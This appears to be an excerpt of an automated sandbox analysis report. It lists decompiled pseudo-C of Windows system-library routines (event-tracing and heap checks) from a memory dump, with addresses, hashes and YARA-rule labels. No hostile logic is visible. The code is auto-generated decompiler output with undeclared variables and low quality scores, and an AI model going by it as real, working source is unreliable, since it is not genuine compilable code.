                                                      C-Code - Quality: 59%
                                                      			E049BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0494FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04927D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0494B640(E04949AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x049bfec0
                                                      0x049bfec0
                                                      0x049bfecf
                                                      0x049bfed9
                                                      0x049bfede
                                                      0x049bfee0
                                                      0x049bfeeb
                                                      0x049bfef3
                                                      0x049bfef6
                                                      0x049bfef9
                                                      0x049bff04
                                                      0x049bff16
                                                      0x049bff06
                                                      0x049bff0f
                                                      0x049bff0f
                                                      0x049bff21
                                                      0x049bff22
                                                      0x049bff24
                                                      0x049bff29
                                                      0x049bff3e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1389875f4dcdb992d6251bbcb0e4a1ebf0338533f2d3108804fd1ab2e57ebe1a
                                                      • Instruction ID: bebb2fd46cc4bf860c3e31e9cd8271dbf3db25a2a4e1c3f6ea3065cd968f5fc5
                                                      • Opcode Fuzzy Hash: 1389875f4dcdb992d6251bbcb0e4a1ebf0338533f2d3108804fd1ab2e57ebe1a
                                                      • Instruction Fuzzy Hash: 22018F71E00218ABDB14DBA9D945FAFBBB8EF84714F404076F901EB280EA74EA01C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049BFE3F, Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E049BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0494FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04927D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0494B640(E04949AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x049bfe3f
                                                      0x049bfe3f
                                                      0x049bfe4e
                                                      0x049bfe58
                                                      0x049bfe5d
                                                      0x049bfe5f
                                                      0x049bfe6a
                                                      0x049bfe72
                                                      0x049bfe75
                                                      0x049bfe78
                                                      0x049bfe83
                                                      0x049bfe95
                                                      0x049bfe85
                                                      0x049bfe8e
                                                      0x049bfe8e
                                                      0x049bfea0
                                                      0x049bfea1
                                                      0x049bfea3
                                                      0x049bfea8
                                                      0x049bfebd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1019befa27109944d3b1579961be078116600bbbc64fc1a513d1d3fa919db7d3
                                                      • Instruction ID: 22ed5168499f5fba8abdf7bfcabe727ed2e94f9b5f07c93d1cb06807a0895c73
                                                      • Opcode Fuzzy Hash: 1019befa27109944d3b1579961be078116600bbbc64fc1a513d1d3fa919db7d3
                                                      • Instruction Fuzzy Hash: D8018471E00218ABDB14DFA9D845FAEBBB8EF84714F004076F900EB281DA74E901C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8ED6, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E049D8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x49fd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04927D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0494B640(E04949AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                      0x049d8ed6
                                                      0x049d8ee5
                                                      0x049d8eed
                                                      0x049d8ef0
                                                      0x049d8efa
                                                      0x049d8f03
                                                      0x049d8f0c
                                                      0x049d8f15
                                                      0x049d8f24
                                                      0x049d8f27
                                                      0x049d8f31
                                                      0x049d8f43
                                                      0x049d8f33
                                                      0x049d8f3c
                                                      0x049d8f3c
                                                      0x049d8f4e
                                                      0x049d8f4f
                                                      0x049d8f51
                                                      0x049d8f56
                                                      0x049d8f69

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c87705b70c59fa383ee14e9e1237f2ba34c3aaa9255d75c81db0220f5018a46a
                                                      • Instruction ID: 3c4038053de21949695acb4dc42450fdff25350410172d9c8d6ffb0665e69914
                                                      • Opcode Fuzzy Hash: c87705b70c59fa383ee14e9e1237f2ba34c3aaa9255d75c81db0220f5018a46a
                                                      • Instruction Fuzzy Hash: E2111E70E002199FDB04DFA9D541BAEBBF4FF48304F0442BAE519EB782E634A940CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8A62, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E049D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x49fd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04927D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0494B640(E04949AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x049d8a62
                                                      0x049d8a71
                                                      0x049d8a79
                                                      0x049d8a82
                                                      0x049d8a85
                                                      0x049d8a89
                                                      0x049d8a8c
                                                      0x049d8a8f
                                                      0x049d8a92
                                                      0x049d8a95
                                                      0x049d8a9f
                                                      0x049d8ab1
                                                      0x049d8aa1
                                                      0x049d8aaa
                                                      0x049d8aaa
                                                      0x049d8abc
                                                      0x049d8abd
                                                      0x049d8abf
                                                      0x049d8ac4
                                                      0x049d8ada

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62e789338cbcf1a5800ad6758e46436323d3a0852a59e3e91b56ee89f3d09a8e
                                                      • Instruction ID: 5f08d0f8a58dd23426a506642ed35439f13f06d2de52402b3f0fd7ea69cf40d1
                                                      • Opcode Fuzzy Hash: 62e789338cbcf1a5800ad6758e46436323d3a0852a59e3e91b56ee89f3d09a8e
                                                      • Instruction Fuzzy Hash: B9012CB1A0021CAFDB04DFA9D941DAEBBB8EF88314F10406AF905F7341E634B900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490DB60, Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0490DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0490DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0490E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0490E8B0(__ecx, _t14, 0xfff);
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                      0x0490db64
                                                      0x0490db66
                                                      0x0490db6b
                                                      0x0490dbaa
                                                      0x0490db71
                                                      0x0490db76
                                                      0x0490db7a
                                                      0x0490dba3
                                                      0x0490db7c
                                                      0x0490db87
                                                      0x0490db8b
                                                      0x04964fa1
                                                      0x04964fb3
                                                      0x04964fb8
                                                      0x0490db91
                                                      0x0490db96
                                                      0x0490db98
                                                      0x0490db98
                                                      0x0490db8b
                                                      0x0490db7a
                                                      0x0490db9d
                                                      0x0490dba2

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: c87845537c1d378b894d023a8b1815aef688cfdf18f211f242779910d5012186
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: D2F0FC332415229FE7726AD94880F27F6DA8FC1A60F154935F1059B3C4C960AC0296D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490B1E1, Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0490B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04927D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04927D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04987016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                      0x0490b1e8
                                                      0x0490b1ea
                                                      0x0490b1f3
                                                      0x04964a17
                                                      0x0490b1f9
                                                      0x0490b1f9
                                                      0x0490b1f9
                                                      0x0490b201
                                                      0x04964a21
                                                      0x04964a2e
                                                      0x00000000
                                                      0x00000000
                                                      0x04964a3b
                                                      0x04964a4d
                                                      0x04964a3d
                                                      0x04964a46
                                                      0x04964a46
                                                      0x04964a55
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0490b20a
                                                      0x0490b20a
                                                      0x0490b20a
                                                      0x0490b20a

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: a2866a1bd0bf36350d5400d0c2badc997400b24d1ae2b54ef351e05027c62553
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: 36018632200580AFD32297DDC904F697BDDEF91754F0944B1F9159B6B2E675F800D219
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0499FE87, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E0499FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x49fd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04927D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0494B640(E04949AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                      0x0499fe96
                                                      0x0499fe9e
                                                      0x0499fea1
                                                      0x0499fead
                                                      0x0499feb3
                                                      0x0499feb9
                                                      0x0499fec3
                                                      0x0499fed5
                                                      0x0499fec5
                                                      0x0499fece
                                                      0x0499fece
                                                      0x0499fee0
                                                      0x0499fee1
                                                      0x0499fee3
                                                      0x0499fee8
                                                      0x0499fefb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c6e6c9b3220e3021dedb6ed068851c7c08c27fb1226d18aa0b26a5f25390a6b
                                                      • Instruction ID: 41784e1d23c7334cbfb299fb57c4d0db0f97f5231ee9fa806a6b6f47904467df
                                                      • Opcode Fuzzy Hash: 0c6e6c9b3220e3021dedb6ed068851c7c08c27fb1226d18aa0b26a5f25390a6b
                                                      • Instruction Fuzzy Hash: 3D016270A00209AFCB14DFA8D545A6EB7F4EF44304F1041A9A505EB382D635ED01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C131B, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E049C131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49fd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04927D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0494B640(E04949AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x049c131b
                                                      0x049c132a
                                                      0x049c1330
                                                      0x049c1336
                                                      0x049c133e
                                                      0x049c1341
                                                      0x049c1344
                                                      0x049c134f
                                                      0x049c1361
                                                      0x049c1351
                                                      0x049c135a
                                                      0x049c135a
                                                      0x049c136c
                                                      0x049c136d
                                                      0x049c136f
                                                      0x049c1374
                                                      0x049c1387

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 481fb25a874dcb0afcc2aefd1843f3c22bc68fa5e893e3ca34aa85128b5b902b
                                                      • Instruction ID: d55ece51395aaff90a799177ebd4ada0f5943506d3ff43dd69846b714cfe3ca9
                                                      • Opcode Fuzzy Hash: 481fb25a874dcb0afcc2aefd1843f3c22bc68fa5e893e3ca34aa85128b5b902b
                                                      • Instruction Fuzzy Hash: 66013C71A01208AFDB04EFA9D545AAEB7F4FF48704F40406AF945EB381E674EA00CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8F6A, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E049D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49fd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04927D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0494B640(E04949AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                      0x049d8f6a
                                                      0x049d8f79
                                                      0x049d8f81
                                                      0x049d8f84
                                                      0x049d8f8b
                                                      0x049d8f91
                                                      0x049d8f94
                                                      0x049d8f9e
                                                      0x049d8fb0
                                                      0x049d8fa0
                                                      0x049d8fa9
                                                      0x049d8fa9
                                                      0x049d8fbb
                                                      0x049d8fbc
                                                      0x049d8fbe
                                                      0x049d8fc3
                                                      0x049d8fd6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c3457682f4701fbcf5b0cef8fda5d8aed894629adab29ff776321b1b7b36fa
                                                      • Instruction ID: 25f7a841ce99e0277baf52c6e1ba5228cee421ee0fa3fdb1886568eb9780ae60
                                                      • Opcode Fuzzy Hash: b2c3457682f4701fbcf5b0cef8fda5d8aed894629adab29ff776321b1b7b36fa
                                                      • Instruction Fuzzy Hash: 47013674A402089FDB04EFB8D545E5EB7F4EF48304F504465B915EB381D674EA00DB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C1608, Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E049C1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x49fd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04927D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0494B640(E04949AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                      0x049c1608
                                                      0x049c1617
                                                      0x049c161d
                                                      0x049c1625
                                                      0x049c1628
                                                      0x049c162b
                                                      0x049c1636
                                                      0x049c1648
                                                      0x049c1638
                                                      0x049c1641
                                                      0x049c1641
                                                      0x049c1653
                                                      0x049c1654
                                                      0x049c1656
                                                      0x049c165b
                                                      0x049c166e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6227c22122afe38de967d8e4e1016c93b498d06451bab11f4ecc8fbd0e093b1b
                                                      • Instruction ID: 59e34cf5c79c135ebe28c0926b3f85f9d85923bea7b97baabca5b295d0ca4be9
                                                      • Opcode Fuzzy Hash: 6227c22122afe38de967d8e4e1016c93b498d06451bab11f4ecc8fbd0e093b1b
                                                      • Instruction Fuzzy Hash: ADF04F71A04258AFDB14DFA8D505E6EB7F4EF44304F444069A905EB381E634A900CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492C577, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0492C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0492C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x48e11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E049D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                      0x0492c577
                                                      0x0492c57d
                                                      0x0492c581
                                                      0x0492c5b5
                                                      0x0492c5b9
                                                      0x0492c5ce
                                                      0x0492c5ce
                                                      0x0492c5ca
                                                      0x00000000
                                                      0x0492c5ca
                                                      0x0492c5c4
                                                      0x0492c5c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0492c5ad
                                                      0x00000000
                                                      0x0492c5af

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e2b34a9eef0377c0d67abf6f0ac32fa97c94b31a54291c2ac1f6ee3e2ac9cab7
                                                      • Instruction ID: 14515c0d244da5cc7b2dc74fe66bcc2189b32b3c60d0afcb5757a03111a58080
                                                      • Opcode Fuzzy Hash: e2b34a9eef0377c0d67abf6f0ac32fa97c94b31a54291c2ac1f6ee3e2ac9cab7
                                                      • Instruction Fuzzy Hash: 0EF0BEB291D6B29FE736DB28C204F2A7BEC9B45774F488877E4168720DC6A4F880C251
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C2073, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E049C2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E049BFD22(__ecx);
				_t19 =  *0x49f849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x49f8748; // 0x0
					if(__eflags <= 0) {
						E049C1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x49f8724 & 0x00000004;
							if(( *0x49f8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x49f8724; // 0x0
					return E049B8DF1(__ebx, 0xc0000374, 0x49f5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                      0x049c2076
                                                      0x049c2078
                                                      0x049c207d
                                                      0x049c2083
                                                      0x049c20a4
                                                      0x049c20aa
                                                      0x049c20ac
                                                      0x049c20b7
                                                      0x049c20ba
                                                      0x049c20bc
                                                      0x049c20c9
                                                      0x049c20c9
                                                      0x049c20d0
                                                      0x049c20d2
                                                      0x00000000
                                                      0x049c20d2
                                                      0x049c20be
                                                      0x049c20c3
                                                      0x049c20c5
                                                      0x049c20c7
                                                      0x00000000
                                                      0x00000000
                                                      0x049c20c7
                                                      0x049c20bc
                                                      0x049c20d4
                                                      0x049c2085
                                                      0x049c2085
                                                      0x049c20a3
                                                      0x049c20a3

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c1dc0e286825928b9cb989d841dfc4ff169a46554f42abd54497ea6555e6d4a
                                                      • Instruction ID: a205d94729c7dfa1cdd48498bbda20b6b78b75e2d1020398923307690490c654
                                                      • Opcode Fuzzy Hash: 5c1dc0e286825928b9cb989d841dfc4ff169a46554f42abd54497ea6555e6d4a
                                                      • Instruction Fuzzy Hash: 9BF0A02A81A6848AFF72FF2665013E16F98D7C5218F5A04FFD59057205C638AD83CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D8D34, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
